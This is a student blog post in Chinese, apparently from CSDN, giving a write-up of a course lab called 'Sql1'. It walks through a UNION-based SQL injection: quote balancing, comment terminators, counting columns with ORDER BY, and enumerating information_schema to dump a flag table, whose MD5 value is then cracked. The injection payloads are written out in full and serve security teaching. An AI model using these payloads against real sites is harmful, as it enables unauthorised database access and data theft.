数据安全课设实验:Sql1

最新推荐文章于 2023-06-24 19:11:32 发布
最新推荐文章于 2023-06-24 19:11:32 发布
阅读量264 收藏 1
点赞数 1
分类专栏: 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rosesor/article/details/93194477
版权

Sql1寻找flag

 

提交:ID=1

结果:是一个注入点。成功select出表有ID、name、age三列。

 

 

猜测需要补全一个单引号:

提交:id=1‘

结果:不成功。说明一个‘不行。

 

继续猜测,需要两个单引号

提交:id=1‘’

结果:成功。说明sql语句需要补全两个单引号。

 

字段数,使用order by,并使用二分法寻找

提交:id=1 ‘order by 3’

结果:不成功。报错是单引号语法错误,因为后面没有加隔断。

 

添加隔断--+-:

提交:id=1 ‘order by 3 --+-’

结果:成功访问,但是没有3列。

Tips:这里的+有可能会被转义,建议直接在网址上面输入

 

 

 

二分法,查是否是两列

提交:id=1 ‘order by 2 --+-’

结果:成功,说明有两列

查询数据库名称

提交:id=9‘ union select database(),2--+-’

结果:查询出数据库名称targetsys。

查询有什么表

提交:id=9’ union select group_concat(table_name),2 from information_schema.tables where table_schema like data--+-’

结果:查出5个表,其中有我们要的flag表

查询列名

提交:id=9 ‘ union select group_concat(column_name),2 from information_schema.colums where table_name like ‘flag’--+-’

结果:查询出两列,id和flag

查询flag

提交:id=9‘ union select group_concat(id,”-”,flag),2 from flag --+-’

结果:查出flag,但是很明显是密文。利用在线解密工具,翻译出原文是123456

Md5解密:123456

rosesor
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实 验 四 数据安全控制
06-02
熟练掌握SQL SERVER数据库中使用SQL命令方式对视图的创建、修改与删除,熟练掌握SQL SERVER数据库中用户和角色的创建、修改和删除,在第一次实验的基础上对用户和角色对表和视图的访问进行权限控制,为后继学习创建数据库项目进行安全控制作准备。
课设作业:基于SpringBoot+Mybatis的实验室设备管理系统.zip
10-09
这是一个基于SpringBoot和Mybatis框架开发的实验室设备管理系统课设项目。该项目的目的是让学生掌握SpringBoot和Mybatis在实际开发中的应用,理解如何利用这些技术构建一个完整的Web应用程序。 SpringBoot是Spring...
数据安全实验演示
Zeker62的博客
10-24 2023
文章目录实验准备修改服务器的身份验证模式实验背景实验结构:实验步骤创建数据库、表创建数据库角色授予权限验证权限 实验准备 本实验准备软件:Azure Data Studio 和 MS SQLserver Manger Sudio 修改服务器的身份验证模式 修改服务器的身份验证模式为“SQL Server和Windows身份验证模式”。 打开MS SQLserver Manger Sudio 右键服务器->属性 点击“安全性”,并勾选图中两个选项: 关闭MS SQLserver Manger Sud
sql 1=1
weixin_33831196的博客
11-21 51
大多数时候是为了sql拼写方便而加的条件从执行任务来看,不影响性能 转载于:https://www.cnblogs.com/Lulus/p/7874233.html
SQL 语句中 where 条件后 写上1=1 是什么意思
SeizeeveryDay的博客
11-05 6113
在编程过程中,经常会在代码中使用到“where 1=1”,这是为什么呢?SQL注入初次看到这种写法的同学肯定很纳闷,加不加where 1=1,查询不都一样吗?例如:select* fr...
数据安全实验报告》
qq_52743307的博客
06-24 289
掌握密码学相关算法的原理。 实验要求: 一、使用加密库实现AES算法 二、使用加密库实现RSA算法 三、使用Python实现加密传输文件
javaweb课设 歌曲管理系统 实验报告及源码
06-28
3. 数据层:使用JDBC进行数据库操作,封装了SQL语句,实现了CRUD(创建、读取、更新、删除)操作。 4. Model类:定义了系统中的实体类,如User、Song等,存储和传递数据。 5. JSP页面:展示用户界面,使用EL和JSTL...
java毕设课设-JSP+sql实验教学管理系统软件源代码+论文文档资料.zip
最新发布
06-16
6. **安全性考虑**:在使用JSP和SQL时,要防范SQL注入攻击,确保输入数据的安全性。这通常通过预编译语句(PreparedStatement)或者使用参数化查询来实现。 7. **文件上传下载功能**:教学管理系统可能涉及文档的...
数据库课设+实验报告+web课设+实验报告
06-07
通过完成这样的课设实验报告,学生可以深入理解数据库和Web开发的基本原理,同时锻炼实际问题解决能力,为未来从事相关工作打下坚实的基础。在实际项目中,还需要考虑安全性、可扩展性、用户体验等因素,这些都将...
数据库课设-实验室设备管理系统.zip
10-16
数据库课设-实验室设备管理系统.zip 文件包包含了对一个完整实验室设备管理系统的设计与实现的详细过程。这个项目旨在帮助学生深入理解和应用数据库技术,通过实际操作来掌握数据库管理系统(DBMS)的设计、实施和...
数据安全课程设计指导书
09-28
共享一份刚刚编写的数据安全课程设计指导书,希望对大家有帮助,本人学识浅薄,希望多多赐教,多反馈信息。有问题和建议可以联系我。
信息安全课程设计报告
03-12
数字签名算法的编程实现 1. 前言 3 1.1研究背景与意义 3 1.2国内外研究现状及分析 5 1.3 研究方法与目的 5 1.4主要功能 6 2. 系统设计 7 2.1总体要求 7 2.2流程图 7 3. 功能设计 8 3.1主要功能 8 3.2流程图 8 4. 所遇到的问题及分析解决 9 4.1使用C++还是java语言完成实验 9 4.2如何用java实现DSA 9 4.3如何将签名功能体现出来 9 4.4如何将公钥、私钥和签名加密并可视化显示 9 5. 系统特色及关键技术 10 5.1DSA加密算法 10 5.2DSA算法概述 10 5.3 DSA算法原理 10 5.4安全性分析 11 5.5 DSA算法的实现 11 6. 测试 14 6.1认证功能 14 6.2完整性 14 6.3不可抵赖 16 7. 结论 17 参考文献 19 附录 20
华中科技大学数据库实验Sql练习部分
01-11
Sql练习部分,包括建表、查询、插入、删除等操作的SQL源代码
SQL_where_1=1的用法
05-31
此文档中详细记载了,SQL_where_1=1的用法,希望可以帮到下载的朋友们!
SQL 语句中 where 条件后 写上1=1 是什么意思
https://github.com/conanl5566
11-19 1268
前言 where 1=1是sql语句条件逻辑判断表达式,由于1=1成立,恒为真,该表达式1=1将始终返回"真"。这种写法实际目的是为了获取逻辑值"True",其实诸如2=2, 1+2=3,'中'='中'等之类的写法都可以返回逻辑值"True",只不过1=1的运算开销更小,故被应用的最普遍。 例子 下面例子将有助于理解有关概念: 1) select * from t1 where 1=1; -- 实际等效于select * from t1 where true; -- 语句将返回t1中所有的.
sql1
在通往牛逼的路上,我一路狂奔!
02-28 143
[code="java"] [B]第一部分、SQL&PL/SQL[/B] [Q]怎么样查询特殊字符,如通配符%与_ [A]select * from table where name like 'A\_%' escape '\' [Q]如何插入单引号到数据库表中 [A]可以用ASCII码处理,其它特殊字符如&也一样,如 insert into t values(...
SQL1
gulie8的博客
06-14 306
SQL语句一般返回原始的、 无格式的数据。 数据的格式化是表示问题, 而不是检索问题。 因此, 表示( 如把上面的价格值显示为正确的十进制数值货币金额) 一般在显示该数据的应用程序中规定。 通常很少直 接使用实际检索出的数据( 没有应用程序提供的格式)。 一般而言, 除非你确实需要表中的每一列, 否则最好别使用*通配符。 虽然使用通配符能让你自 己省事, 不用明确列出所需列, 但检索不需要的列...
SQL语句加 1=1
cherish_2012的专栏
03-13 801
是为了链接下面的查询条件条件,也或者是替换没有查询条件的语句。 比如:要把检索条件作为一个参数传递给SQL,那么,当这个检索语句不存在的话就可以给它赋值为1=1.这样就避免了SQL出错,也就可以把加条件的SQL和不加条件的SQL合二为一。
数据库原理实验SQL操作与数据查询
实验内容包括SQL定义功能、数据插入、数据查询等,提供了具体的实验步骤和示例。文档中特别提到了实验六涉及选课系统的设计模型,但指出该部分可以作为选读内容。" 实验一主要讲解了如何使用SQL进行基本的数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值